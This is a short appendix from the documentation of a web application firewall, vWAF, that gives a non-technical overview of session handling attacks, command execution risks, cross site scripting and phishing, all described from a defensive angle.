Basics of Web Application Security
In this appendix you can find some general background information on web application security. You don’t need to know all this in detail to be able to use and operate vWAF, but some basic understanding will be helpful.
-
This topic provides a general overview on the typical vulnerabilities of web applications.
-
Authentication and Session Handling
Many web applications use some form of session management in order to create an environment that suits the user. The information linked with the session ID is an attractive target for attackers. This topic offers information on attack techniques like session prediction, session interception, session fixation or brute force attacks and how to ward them off. The questions of authentication and authorization play a leading role here.
-
Is a user harmless or dangerous? This is one of the basic questions of web application security. As virtually every programming or script language permits the execution of system commands, the risk is very high. Effective countermeasures are sophisticated input validations, which prevent this from happening.
-
An especially simple method of manipulating or intercepting a session ID is cross site scripting. Even though we’ve been familiar with cross site scripting attacks for some time now, they’re often not taken very seriously today. A reason for this could be that you can only cause indirect damage using this method and the damage is primarily on the user side and not on the web application operator side. However, cross site scripting attacks are used as a simple “entry point” for more serious manipulation attacks.
-
Phishing, Pharming, Social Engineering
Not all methods of attack are primarily of a technical nature. Human beings, the users, represent a key weak point, too.